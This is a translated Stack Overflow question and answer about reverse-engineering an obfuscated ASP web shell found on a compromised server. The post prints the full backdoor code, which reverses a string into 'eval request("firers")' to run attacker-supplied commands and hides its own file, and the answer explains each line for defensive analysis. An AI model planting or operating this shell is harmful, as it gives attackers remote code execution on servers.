我在我的服务器上发现了有趣的恶意软件,它做了一些坏事。 现在我正在尝试对其进行逆向工程,但由于完全缺乏VB\ASP知识,我需要向各位同事寻求帮助。
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
据我了解 - 它执行一些命令并在具有系统\隐藏属性的地方创建文件。 主要问题是 - 如何使用它,即从我看到的日志中,黑客上传了这个文件并使用 POST 来命令它。我也想命令它来了解他如何将文件上传到某些文件夹,他应该能够这样做。
欢迎任何建议。使用curl POST 的示例将会很棒。
最佳答案
不,不需要 VB 知识来研究该代码的作用;只需阅读文档即可。
MorfiCoder(")/*/srerif/*/(tseuqer lave") 返回 eval request("firers") (我假设像 Replace 这样的函数 或 StrReverse 是显而易见的)。
执行和评估是不言自明的; request 的文档是 here :
The Request object retrieves the values that the client browser passed to the server during an HTTP request.
因此,无论 firers 请求变量中包含什么字符串,它都会被执行(您说过您已经知道攻击者使用简单的 POST 来将数据发送到他的脚本)。
Set fso=CreateObject("Scripting.FileSystemObject") 创建 FileSystemObject Object .
设置 f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) creates一个File Object ;使用 PATH_TRANSLATED 中的路径.
然后一些attributes (Archive、System、Hidden、ReadOnly)在该文件对象上设置(以隐藏此脚本)。
为什么你的攻击者能够将此文件上传到你的服务器,显然你提供的信息无法回答,而且也超出了这个问题的范围,并且可能偏离了 stackoverflow 的主题。
关于asp.net - VB恶意软件逆向工程工具,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29364705/